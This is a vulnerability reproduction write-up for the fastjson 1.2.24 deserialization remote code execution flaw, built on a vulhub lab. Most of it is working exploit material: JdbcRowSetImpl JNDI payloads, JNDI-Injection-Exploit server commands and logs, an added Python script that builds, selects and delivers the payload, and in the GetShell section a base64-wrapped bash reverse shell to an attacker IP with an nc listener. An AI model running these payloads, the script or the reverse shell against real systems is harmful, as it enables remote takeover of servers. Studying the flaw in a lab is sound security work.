[Vulnerability Reproduction] fastjson_1.2.24_unserializer_rce

Thanks to the Internet for sharing knowledge and wisdom. In a society ruled by law, please abide by relevant laws and regulations

Article directory

      • 1.1. Vulnerability description
      • 1.2. Vulnerability level
      • 1.3. Affected versions
      • 1.4. Vulnerability reproduction
        • 1. Basic environment
        • 2. Vulnerability detection
        • 3. Vulnerability verification
      • 1.5. In-depth exploitation
        • 1. GetShell
Description                Content
Vulnerability number
Vulnerability name         fastjson 1.2.24 deserialization leads to arbitrary command execution
Vulnerability rating       High risk
Scope of impact            fastjson 1.2.24
Vulnerability description  Unchecked @type (autoType) handling in parseObject/parse lets a JSON document name an arbitrary class to instantiate
Repair plan

1.1. Vulnerability description

FastJson is an open source JSON parsing library from Alibaba. It converts Java objects into their JSON representation and converts JSON strings back into equivalent Java objects. FastJson vulnerabilities have surfaced one after another in recent years; the root of the whole RCE family is the deserialization vulnerability found in FastJson 1.2.24 in 2017.

In short, the 1.2.24 vulnerability exists because FastJson performs no reasonable check on the class name when parseObject/parse turn an incoming string into a Java object. A JSON key named @type tells FastJson which class to instantiate, and every other key in the same object is passed to the matching setter. With com.sun.rowset.JdbcRowSetImpl, a class present in every JDK, setDataSourceName stores an attacker-controlled JNDI name and setAutoCommit(true) calls connect(), which performs InitialContext.lookup() on that name. The lookup contacts an attacker-run RMI or LDAP server and, on a JDK that still trusts remote codebases (or with a suitable local gadget such as Tomcat's BeanFactory on the classpath), instantiates an attacker-chosen object, so the attacker's code runs inside the target JVM.

1.2. Vulnerability level

High risk

1.3. Affected versions

fastjson 1.2.24 and earlier (the environment below ships 1.2.24; the unchecked @type handling was changed in 1.2.25)

1.4. Vulnerability reproduction

1. Basic environment

Path: vulhub/fastjson/1.2.24-rce

Start the test environment:

sudo docker-compose up -d

Visit http://your-ip:8090/; the service answers with a JSON document. POSTing a JSON object to the same URL (Content-Type: application/json) makes the server parse it with fastjson.

Send test data:

{"name":"hello", "age":20}

2. Vulnerability detection

Use the BurpSuite extension FastjsonScan for vulnerability detection, or send the following POC by hand.

POC:

{
    "handsome":{
    "@type":"Lcom.sun.rowset.JdbcRowSetImpl;",
    "dataSourceName":
    "rmi://wvvlunpw9mk6u4suzoi884ibw22sqh.oastify.com/aaa",
    "autoCommit":true
    }
}

The outer key name (handsome) is arbitrary. The "L...;" form of the class name is the JVM descriptor spelling, which TypeUtils.loadClass in 1.2.24 strips back to com.sun.rowset.JdbcRowSetImpl. Test with dnslog: the hostname in dataSourceName belongs to a Burp Collaborator (oastify.com) instance, so if the target resolves it the JNDI lookup was executed, even though no RMI server is listening there.

3. Vulnerability verification

Use the JNDI-Injection-Exploit tool to start the RMI and LDAP servers. The -C argument is the command the served payload will execute; -A is the address the target must connect back to. This first run creates the file /tmp/hello on the target:

┌──(kali㉿kali)-[~/tools/JNDI-Injection-Exploit]
└─$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/hello" -A "192.168.80.141"
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[ADDRESS] >> 192.168.80.141
[COMMAND] >> touch /tmp/hello
----------------------------JNDI Links----------------------------
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://192.168.80.141:1099/52e3fa
ldap://192.168.80.141:1389/52e3fa
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://192.168.80.141:1099/atawc5
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://192.168.80.141:1099/gfk0fp
ldap://192.168.80.141:1389/gfk0fp

----------------------------Server Log----------------------------
2023-09-08 01:38:44 [JETTYSERVER]>> Listening on 0.0.0.0:8180
2023-09-08 01:38:44 [RMISERVER] >> Listening on 0.0.0.0:1099
2023-09-08 01:38:44 [LDAPSERVER] >> Listening on 0.0.0.0:1389

The tool prints three groups of links. The two "trustURLCodebase is true" groups rely on the target JDK fetching a class file from the tool's HTTP server on port 8180, which Oracle disabled by default for RMI in 8u121 and for LDAP in 8u191. The "trustURLCodebase is false" group instead returns a JNDI Reference that is resolved by Tomcat's org.apache.naming.factory.BeanFactory, already on the target's classpath, so it does not depend on remote class loading at all. Since the vulhub target is a Spring Boot application with embedded Tomcat, that is the link used here.

Send the POC to the FastJson server; the JNDI lookup fetches the malicious object over the RMI protocol:

{
    "handsome":{
    "@type":"Lcom.sun.rowset.JdbcRowSetImpl;",
    "dataSourceName": "rmi://192.168.80.141:1099/atawc5",
    "autoCommit":true
    }
}

Verify: /tmp/hello now exists inside the target container (check from a shell in the container, and watch the tool's server log for the incoming lookup).
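The two POCs above (the Collaborator probe in the detection step and the RMI link in the verification step) differ only in the dataSourceName value, and picking the right link out of the tool's output is the error-prone part. The following script is an added example, not part of the original write-up, of vulhub or of JNDI-Injection-Exploit: it builds the JdbcRowSetImpl payload for any JNDI URL, groups the links the tool prints by target environment so the correct one can be selected, and POSTs the payload. It assumes the vulhub app at http://your-ip:8090/ parses the POST body with fastjson; the embedded SAMPLE_TOOL_OUTPUT is a trimmed copy of the run shown above so the selection logic can be exercised offline.

```python
"""Build, select and deliver the JdbcRowSetImpl JNDI payload for the
fastjson 1.2.24 target. Added example, not from the write-up, vulhub or
JNDI-Injection-Exploit. Assumes the vulhub app on http://<target>:8090/
parses the POST body with fastjson."""
import json
import re
import sys
import urllib.request


def build_payload(jndi_url, key="handsome"):
    """Return the JSON body that makes fastjson 1.2.24 instantiate
    com.sun.rowset.JdbcRowSetImpl and trigger a JNDI lookup.

    @type names the class; the remaining keys are fed to setters in order:
    setDataSourceName(jndi_url), then setAutoCommit(true), which calls
    connect() -> InitialContext.lookup(jndi_url). The "L...;" spelling is
    the descriptor form that TypeUtils.loadClass in 1.2.24 unwraps."""
    obj = {
        key: {
            "@type": "Lcom.sun.rowset.JdbcRowSetImpl;",
            "dataSourceName": jndi_url,
            "autoCommit": True,
        }
    }
    return json.dumps(obj)  # dict order is preserved, so @type comes first


_LINK = re.compile(r"^(rmi|ldap)://\S+$")


def parse_jndi_links(tool_output):
    """Group the rmi:// and ldap:// links printed by JNDI-Injection-Exploit
    under the 'Target environment(...)' heading they belong to."""
    groups, current = {}, None
    for raw in tool_output.splitlines():
        line = raw.strip()
        if line.startswith("Target environment"):
            current = line[len("Target environment"):].strip("():")
            groups[current] = []
        elif current is not None and _LINK.match(line):
            groups[current].append(line)
    return groups


def select_link(groups, environment_hint, scheme="rmi"):
    """Pick the first link whose environment heading contains the hint
    (e.g. 'trustURLCodebase is false' for the Tomcat BeanFactory gadget,
    'JDK 1.8' for the remote-codebase gadget) and uses the given scheme."""
    for env, links in groups.items():
        if environment_hint in env:
            for link in links:
                if link.startswith(scheme + "://"):
                    return link
    return None


def send_payload(target_url, payload, timeout=10):
    """POST the payload exactly as the write-up does by hand. The HTTP
    response is not the signal: success shows up in the JNDI server log and
    as the command's side effect on the target."""
    req = urllib.request.Request(
        target_url, data=payload.encode(),
        headers={"Content-Type": "application/json"}, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status, resp.read().decode(errors="replace")


# Trimmed copy of the tool output shown above; the IDs belong to that run.
SAMPLE_TOOL_OUTPUT = """\
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://192.168.80.141:1099/52e3fa
ldap://192.168.80.141:1389/52e3fa
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://192.168.80.141:1099/atawc5
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://192.168.80.141:1099/gfk0fp
ldap://192.168.80.141:1389/gfk0fp
"""

if __name__ == "__main__":
    # usage: python poc.py http://your-ip:8090/ < tool_output.txt
    text = SAMPLE_TOOL_OUTPUT if sys.stdin.isatty() else sys.stdin.read()
    link = select_link(parse_jndi_links(text), "trustURLCodebase is false")
    print("using", link)
    print(send_payload(sys.argv[1], build_payload(link)))
```

The "trustURLCodebase is false" hint is the safe default against a Spring Boot target because it does not depend on the JDK patch level; switch the hint to "JDK 1.8" and the scheme to "ldap" to reproduce the remote-codebase variant used in the GetShell section.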

1.5. In-depth exploitation

1. GetShell

Construct a reverse shell command:

bash -i >& /dev/tcp/192.168.80.141/1234 0>&1

The served class runs the command through Runtime.exec(String), which splits on whitespace and understands neither redirections nor pipes, so the command is base64-encoded and wrapped with bash brace expansion so that no token contains a space:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjE0MS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}

Listen on port 1234 on the attacker machine:

nc -lvp 1234

Start the JNDI servers again with the wrapped command:

┌──(kali㉿kali)-[~/tools/JNDI-Injection-Exploit]
└─$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjE0MS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}" -A "192.168.80.141"
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[ADDRESS] >> 192.168.80.141
[COMMAND] >> bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjE0MS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}
----------------------------JNDI Links----------------------------
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://192.168.80.141:1099/qkgjya
ldap://192.168.80.141:1389/qkgjya
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://192.168.80.141:1099/n9qirm
ldap://192.168.80.141:1389/n9qirm
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://192.168.80.141:1099/nmyogr

----------------------------Server Log----------------------------
2023-09-08 01:53:48 [JETTYSERVER]>> Listening on 0.0.0.0:8180
2023-09-08 01:53:48 [RMISERVER] >> Listening on 0.0.0.0:1099
2023-09-08 01:53:48 [LDAPSERVER] >> Listening on 0.0.0.0:1389

POC:

{
    "handsome":{
    "@type":"Lcom.sun.rowset.JdbcRowSetImpl;",
    "dataSourceName": "ldap://192.168.80.141:1389/qkgjya",
    "autoCommit":true
    }
}

This time the ldap:// link from the "JDK 1.8 whose trustURLCodebase is true" group is used. It only works because the target JDK still trusts LDAP codebases (before 8u191) and loads the class from the tool's HTTP server on port 8180; against a patched JDK, the Tomcat/SpringBoot link (nmyogr here) is the one to send.

Get Shell: after the POC is sent, the target decodes and runs the reverse shell command and an interactive bash session appears on the nc listener.